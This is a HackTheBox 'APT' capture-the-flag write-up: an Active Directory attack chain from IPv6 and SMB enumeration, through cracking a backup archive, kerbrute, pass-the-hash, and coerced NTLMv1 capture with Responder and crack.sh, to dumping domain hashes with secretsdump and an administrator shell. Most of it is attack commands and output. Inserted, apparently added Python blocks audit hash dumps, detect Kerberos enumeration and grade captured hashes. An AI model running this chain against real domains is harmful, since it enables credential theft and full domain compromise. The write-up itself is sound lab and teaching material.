Hackthebox APT WriteUp

Jim Solomon
8 min read · Apr 10, 2021

Overview:

APT is an insanely tough Windows AD box that requires deep knowledge of Windows AD environments. The first step is to leak the server's IPv6 address, because nmap only returned two ports, 80 and 135. Once we have the IPv6 address, port 445 is reachable, and the SMB share there holds a backup.zip. The backup.zip contains Windows registry files that contain passwords and hashes. In this case, using crackmapexec to test the hashes for a user gets blocked, so we turn to getTGT to request a ticket instead. Then reg.py is used to query registry keys on the server, which leaks user henry's password. The privesc is to use Responder to catch an NTLM hash from the box, then pass it and dump hashes with secretsdump.py, which yields the Administrator's hash. There are a lot of details to learn. So, with all that being said, let's just jump in.

Recon:

# Nmap 7.91 scan initiated Fri Apr  2 18:26:17 2021 as: nmap -sC -sV -p- -oN all -vvv 10.10.10.213
Nmap scan report for apt.htb (10.10.10.213)
Host is up, received echo-reply ttl 127 (0.11s latency).
Scanned at 2021-04-02 18:26:17 EDT for 349s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 2 18:32:06 2021 -- 1 IP address (1 host up) scanned in 348.87 seconds

Heading over to the web server turns up nothing useful, but there has to be more to this box than that.

The foothold:

Enumerate IPv6 addresses (details are in the blog linked below) and use the OXID resolver to find them.

Use IOXIDResolver to leak the IPv6 addresses:

root@kali:/opt/IOXIDResolver# python IOXIDResolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::8f4:ffbc:b588:5bfe

Add the IPv6 address to /etc/hosts as “dead:beef::b885:d62a:d679:573f addr apt.htb apt.htb.local htb.local” and use nmap to scan these IPv6 addresses.

nmap -vv --reason -6 -Pn -sU -A --top-ports=20 --version-all dead:beef::b885:d62a:d679:573f
nmap -vv --reason -6 -Pn -sV -sC --version-all dead:beef::8f4:ffbc:b588:5bfe

Port 445 (SMB) is open over IPv6, so try connecting to it with smbclient.

root@kali:/opt/IOXIDResolver# smbclient -L \\\\apt.htb\\
WARNING: no network interfaces found
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
backup Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
box.htb is an IPv6 address -- no workgroup available

There is a backup.zip file; let's grab it from the share.

root@kali:~/htb/boxes/apt# smbclient \\\\apt.htb\\backup
WARNING: no network interfaces found
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Sep 24 03:30:52 2020
.. D 0 Thu Sep 24 03:30:52 2020
backup.zip A 10650961 Thu Sep 24 03:30:32 2020
10357247 blocks of size 4096. 6966776 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (731.7 KiloBytes/sec) (average 731.7 KiloBytes/sec)

The archive is password-protected, so use fcrackzip with the rockyou wordlist to crack it.

root@kali:~/htb/boxes/apt# fcrackzip -D -p ~/rockyou.txt backup.zip
possible pw found: iloveyousomuch ()
root@kali:~/htb/boxes/apt# unzip backup.zip
Archive: backup.zip
creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password:
inflating: Active Directory/ntds.dit
inflating: Active Directory/ntds.jfm
creating: registry/
inflating: registry/SECURITY
inflating: registry/SYSTEM

There are some juicy files here, but the most interesting are ntds.dit and SYSTEM: ntds.dit is the Active Directory database that stores the account password hashes, and the SYSTEM registry hive holds the key needed to extract them.

Once the hashes have been extracted from ntds.dit and SYSTEM into passwordandhashes.txt, there are a bunch of users and hashes. Now clear up the top and bottom so that the file only has usernames and hashes. Then use awk to print the usernames, deduplicate them, and save them to a file called users.txt.

awk -F ':' '{print $1}' passwordandhashes.txt | sort -u > users.txt
root@kali:/opt/adtools# cat ~/htb/boxes/apt/users.txt | wc -l
2001
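Since the rest of the box hinges on reading this dump format correctly (domain\uid:rid:lmhash:nthash::: for NTLM records, user:etype:key for Kerberos keys), here is an added example, my own code rather than anything from the write-up, that parses such lines and goes a bit beyond the awk pipeline: besides producing the unique username list it audits the records for blank passwords, accounts that still store an LM hash, machine accounts, and NT hash reuse between accounts. The sample dump reuses values shown on this page; the svc_legacy record and its LM hash, and the htb.local\ prefix on the henry.vinson_adm line, are constructed to exercise the checks.

```python
import re
from collections import defaultdict

# LM hash of the empty string: LM storage is disabled, no LM hash to attack.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string: the account has a blank password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# domain\user:rid:lmhash:nthash:::  (domain prefix is optional)
NTLM_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)
# user:aes256-cts-hmac-sha1-96:key  and similar Kerberos key records
KERB_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<etype>[a-z0-9-]+):(?P<key>[0-9a-fA-F]+)$"
)

# Constructed sample: page values plus one made-up account (svc_legacy) and a
# domain-prefixed line, so every audit check has something to report.
SAMPLE_DUMP = r"""
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
htb.local\henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
svc_legacy:1200:1c3a2b4d5e6f708192a3b4c5d6e7f801:2de80758521541d19cabba480b260e8f:::
Administrator:aes256-cts-hmac-sha1-96:d35ae5b9bf5ee7f6c4480bb73b3d8235f022b4fd504c7a3e35b9101b4c40e1d4
henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd
"""


def parse_dump(text):
    """Split a dump into NTLM records and Kerberos key records, ignoring
    blank lines, tool banners and '[*]' status lines."""
    ntlm, kerb = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("["):
            continue
        m = NTLM_LINE.match(line)
        if m:
            ntlm.append(m.groupdict())
            continue
        m = KERB_LINE.match(line)
        if m:
            kerb.append(m.groupdict())
    return ntlm, kerb


def usernames(text):
    """Unique account names across both record types, sorted: the same list
    the awk | sort -u pipeline produces, minus any domain prefix."""
    ntlm, kerb = parse_dump(text)
    return sorted({r["user"] for r in ntlm} | {r["user"] for r in kerb})


def audit(records):
    """Hygiene findings a defender would want from the NTLM records."""
    findings = {"blank_password": [], "lm_hash_present": [],
                "machine_accounts": [], "shared_nt_hash": {}}
    by_nt = defaultdict(list)
    for r in records:
        nt, lm = r["nt"].lower(), r["lm"].lower()
        if nt == EMPTY_NT:
            findings["blank_password"].append(r["user"])
        if lm != EMPTY_LM:            # LM hash stored: crackable in hours
            findings["lm_hash_present"].append(r["user"])
        if r["user"].endswith("$"):   # computer account (like APT$ on this box)
            findings["machine_accounts"].append(r["user"])
        by_nt[nt].append(r["user"])
    # Same NT hash on two accounts means the same password (no salt in NTLM).
    findings["shared_nt_hash"] = {
        h: sorted(users) for h, users in by_nt.items()
        if len(users) > 1 and h != EMPTY_NT
    }
    return findings


if __name__ == "__main__":
    ntlm_records, _ = parse_dump(SAMPLE_DUMP)
    print(len(usernames(SAMPLE_DUMP)), "unique accounts")
    for key, value in audit(ntlm_records).items():
        print(f"{key}: {value}")
```

Running it on a real dump takes the file contents in place of SAMPLE_DUMP; the shared_nt_hash finding is the one that matters most in a review, since identical NT hashes mean identical passwords, which is how a leaked low-privilege account turns into a privileged one.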

There are 2001 users, so we can use kerbrute (grab it from the link below) to brute-force the user list and find which accounts are valid on the domain controller. From the earlier nmap scan, the --dc (domain controller) for kerbrute is apt.htb.local and -d (domain) is htb.local. Now let's fire up kerbrute.

root@kali:~/htb/boxes/apt# ./kerbrute_linux_amd64 userenum --dc apt.htb.local -d htb.local users.txt
Version: v1.0.3 (9dad6e1) - 01/05/21 - Ronnie Flathers @ropnop
2021/01/05 13:24:29 > Using KDC(s):
2021/01/05 13:24:29 > apt.htb.local:88
2021/01/05 13:24:40 > [+] VALID USERNAME: Administrator@htb.local
2021/01/05 13:25:40 > [+] VALID USERNAME: APT$@htb.local
2021/01/05 13:31:36 > [+] VALID USERNAME: henry.vinson@htb.local
2021/01/05 13:41:19 > Done! Tested 2001 usernames (3 valid) in 1009.042 seconds
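The kerbrute run above sends one AS-REQ per candidate name and tells valid from invalid accounts by the KDC's reply, which is exactly what makes it visible on the domain controller: every request lands in the security log as event 4768 (a Kerberos authentication ticket was requested), and an unknown name produces a failure with Result Code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), while an existing account that needs pre-authentication yields 0x19 (KDC_ERR_PREAUTH_REQUIRED). The following added detection example is my own code, not part of the write-up; the log lines are a constructed, simplified rendering of those events, the account names in them are made up, and the 60-second window and threshold of 5 are assumptions to tune for a real environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Result codes seen in event 4768's "Result Code" field.
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # the requested account name does not exist
KDC_ERR_PREAUTH_REQUIRED = "0x19"     # account exists; client must pre-authenticate

# Constructed sample (not real DC output): timestamp|event id|account|client ip|result code
SAMPLE_LOG = """\
2021-01-05T13:24:29|4768|aaron.adams|10.10.14.2|0x6
2021-01-05T13:24:29|4768|abby.allen|10.10.14.2|0x6
2021-01-05T13:24:30|4768|adam.baker|10.10.14.2|0x6
2021-01-05T13:24:30|4768|Administrator|10.10.14.2|0x19
2021-01-05T13:24:31|4768|alice.brown|10.10.14.2|0x6
2021-01-05T13:24:31|4768|andy.clark|10.10.14.2|0x6
2021-01-05T13:24:32|4768|henry.vinson|10.10.14.2|0x19
2021-01-05T13:25:10|4768|henry.vinson|10.10.10.50|0x0
2021-01-05T13:26:00|4768|jdoe|10.10.10.51|0x6
"""


def parse_event(line):
    """Turn one pipe-delimited line into a dict with a real timestamp."""
    ts, event_id, user, client, status = line.split("|")
    return {"ts": datetime.fromisoformat(ts), "event_id": int(event_id),
            "user": user, "client": client, "status": status.lower()}


def enumeration_sources(log, window_seconds=60, threshold=5):
    """Return, per client address, the largest number of distinct unknown
    account names it requested within any window, when that number reaches
    the threshold, together with the existing accounts it also touched."""
    by_src = defaultdict(list)
    for ev in (parse_event(l) for l in log.splitlines() if l.strip()):
        if ev["event_id"] == 4768 and ev["status"] != "0x0":   # failures only
            by_src[ev["client"]].append(ev)

    window = timedelta(seconds=window_seconds)
    alerts = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        start, best = 0, set()
        for end, ev in enumerate(events):
            # slide the window start forward until it is within window of ev
            while events[start]["ts"] < ev["ts"] - window:
                start += 1
            unknown = {e["user"] for e in events[start:end + 1]
                       if e["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN}
            if len(unknown) > len(best):
                best = unknown
        if len(best) >= threshold:
            alerts[src] = {
                "unknown_accounts": len(best),
                # valid names the scanner confirmed: what it walked away with
                "existing_accounts_probed": sorted(
                    {e["user"] for e in events
                     if e["status"] == KDC_ERR_PREAUTH_REQUIRED}),
            }
    return alerts


if __name__ == "__main__":
    for src, info in enumeration_sources(SAMPLE_LOG).items():
        print(src, info)
```

The distinct-name count is what separates enumeration from a user fat-fingering their own name a few times: 10.10.10.51 fails once and never alerts, while 10.10.14.2 burns through five unknown names in three seconds and is reported along with the two real accounts it confirmed.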

Grep the above accounts' hashes out of the dump and analyze them.

root@kali:~/htb/boxes/apt# cat passwordandhashes.txt | grep 'henry.vinson\|Administrator\|APT'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
Administrator:aes256-cts-hmac-sha1-96:d35ae5b9bf5ee7f6c4480bb73b3d8235f022b4fd504c7a3e35b9101b4c40e1d4
Administrator:aes128-cts-hmac-sha1-96:26c50872286f2847fc85cf611871106d
Administrator:des-cbc-md5:c767fd15d55eabef
APT$:aes256-cts-hmac-sha1-96:d5063cca2e42ccf7be4fe802d6d231aebd279a19e45733cabc173d4235ed432b
APT$:aes128-cts-hmac-sha1-96:cca6a15aed61bc9d6e3add512f1f377b
APT$:des-cbc-md5:07d05b1a1a34d63d
henry.vinson:aes256-cts-hmac-sha1-96:4c0ec4cffc953266ed72d9b565da62115655d2f402416af92e4e76d121663e2f
henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd
henry.vinson:des-cbc-md5:80a2c83213b3dfd6
root@kali:~/htb/boxes/apt# cat passwordandhashes.txt | grep -v aes | grep -v des | awk -F '\\:' '{print $3":"$4}' > hashes.txt

Use crackmapexec to find which hash is valid, but it blocks brute-force authentication, so we have to find another way.

Another way is to get a Kerberos ticket and use it to connect with evil-winrm. Use a script around getTGT to request a ticket with each hash in turn; unlike crackmapexec, this doesn't get our IP blocked.

It takes some time to run through all the hashes. After a while I had henry.vinson's hash. Now use reg.py to query the registry remotely.

aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb
root@kali:~/htb/boxes/apt# reg.py -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\SOFTWARE\\GiganticHostingManagementSystem
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\SOFTWARE\GiganticHostingManagementSystem
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#Ny5@2dvht

Found credentials for henry.vinson_adm.

PrivEsc to Administrator:

root@kali:~/htb/boxes/schooled# evil-winrm -i (ipv6addresshere) -u henry.vinson_adm -p 'G1#Ny5@2dvht'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS

Poking around, there is a file in the PowerShell history directory.

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> type C:\Users\henry.vinson_adm\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}

That script changes the LAN Manager authentication level (LmCompatibilityLevel) on Windows.

This means that, at level 2, client devices use NTLMv1 authentication, and they use NTLMv2 session security if the server supports it. Domain controllers accept LM, NTLM, and NTLMv2 authentication.

So we can capture NTLMv1 hashes on our client side; we just need to run Responder and have the target connect back to us. This is one time Windows Defender is going to work for us.

cd "\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0"
.\MpCmdRun.exe -Scan -ScanType 3 -File \\ip\file.exe

Before running Responder, we need to change its challenge to the magic number (details are in the link below). Then run Responder to catch the hash.

[SMB] NTLMv1 Client   : 10.10.10.213
[SMB] NTLMv1 Username : HTB\APT$
[SMB] NTLMv1 Hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
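Two things in that capture make it so damaging, and both are visible from the record itself: the LM and NT response fields are identical, which only happens when the client answered with plain NTLMv1 and no Extended Session Security (the consequence of LmCompatibilityLevel 2 described above), and the server challenge is the fixed 1122334455667788 rather than a random one, so the 24-byte DES responses map straight back to the NT hash. The following added example, my own code and not part of the write-up, reads Responder-style hash lines the way a SOC review of a capture would and grades them; the first sample lines are copied from the output above, and the NTLMv2-SSP line with its dummy hex is constructed for contrast.

```python
import re

# The fixed challenge the write-up refers to as the "magic number".
STATIC_CHALLENGE = "1122334455667788"

HASH_LINE = re.compile(
    r"\[(?P<proto>[A-Z0-9-]+)\]\s+(?P<kind>NTLMv[12](?:-SSP)?)\s+Hash\s*:\s*(?P<field>\S+)"
)

# Constructed sample: the NTLMv1 lines are the page's Responder output, the
# NTLMv2-SSP line is made up with dummy hex values.
SAMPLE_LOG = """\
[SMB] NTLMv1 Client   : 10.10.10.213
[SMB] NTLMv1 Username : HTB\\APT$
[SMB] NTLMv1 Hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[SMB] NTLMv2-SSP Hash : jdoe::HTB:4f7a1b2c3d4e5f60:00112233445566778899aabbccddeeff:0101000000000000aabbccddeeff0011
"""


def client_sends_ntlmv1(lm_compatibility_level):
    """LmCompatibilityLevel 0-2 lets the client answer with NTLMv1 (level 2
    is what the PowerShell history set); 3 and above send NTLMv2 only."""
    return lm_compatibility_level < 3


def parse_record(line):
    """Parse one Responder hash line, or return None for non-hash lines.
    NTLMv1 field layout: user::domain:lmresp:ntresp:challenge
    NTLMv2 field layout: user::domain:challenge:ntproof:blob"""
    m = HASH_LINE.search(line)
    if not m:
        return None
    parts = m.group("field").split(":")
    if len(parts) != 6:
        raise ValueError("unexpected field count: %d" % len(parts))
    user, domain = parts[0], parts[2]
    rec = {"proto": m.group("proto"), "version": m.group("kind"),
           "user": user, "domain": domain,
           "machine_account": user.endswith("$")}
    if rec["version"].startswith("NTLMv1"):
        lm_resp, nt_resp, challenge = (p.lower() for p in parts[3:6])
        rec.update({
            "challenge": challenge,
            # With ESS the LM field carries a client nonce, so identical LM
            # and NT responses mean NTLMv1 with no session security at all.
            "ess": lm_resp != nt_resp,
            "static_challenge": challenge == STATIC_CHALLENGE,
        })
    else:
        challenge = parts[3].lower()
        rec.update({"challenge": challenge, "ess": None,
                    "static_challenge": challenge == STATIC_CHALLENGE})
    return rec


def risk(rec):
    """Grade how much an attacker holding this capture can do with it."""
    if rec["version"].startswith("NTLMv1"):
        if not rec["ess"] and rec["static_challenge"]:
            return "critical"   # known challenge + DES responses: NT hash recoverable
        return "high"           # still NTLMv1, but needs more work to crack
    return "low"                # NTLMv2: offline guessing only, salted per session


def review(log):
    """All hash records in a log, each annotated with its risk grade."""
    records = (parse_record(line) for line in log.splitlines())
    return [dict(r, risk=risk(r)) for r in records if r]


if __name__ == "__main__":
    for r in review(SAMPLE_LOG):
        print(r["risk"], r["version"], r["domain"] + "\\" + r["user"],
              "ess=%s static_challenge=%s" % (r["ess"], r["static_challenge"]))
```

The grading is the defender's takeaway: a machine account (trailing $) answering NTLMv1 to a static challenge is the worst case, because whoever recovers that NT hash holds the domain controller's own identity, which is exactly what the rest of this write-up goes on to use.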

Hash format for crack.sh: NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384

Submit it to https://crack.sh/get-cracking/ and they email back the result very soon.

Crack.sh has successfully completed its attack against your NETNTLM handshake. The NT hash for the handshake is included below, and can be plugged back into the 'chapcrack' tool to decrypt a packet capture, or to authenticate to the server:
Token: $NETNTLM$1122334455667788$95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
Key: d167c3238864b12f5f82feae86a7f798

Use the key to dump secrets. First build the hash string: “aad3b435b51404eeaad3b435b51404ee” is the empty LM hash (meaning no LM password), and the second half is the NT hash we just cracked. So the whole hash is:

aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798

Now fire up secretsdump.py to pass the hash and dump every hash in the apt domain.

root@kali:~/htb/boxes/apt# secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798 'apt.htb/APT$@apt.htb.local'
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
APT$:des-cbc-md5:76c45245f104a4bf
[*] Cleaning up...

Use evil-winrm to log in to the Administrator account.

root@kali:~/htb/boxes/apt# evil-winrm -i apt.htb -u administrator -H c370bddf384a691d811ff3495e8a72e2
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
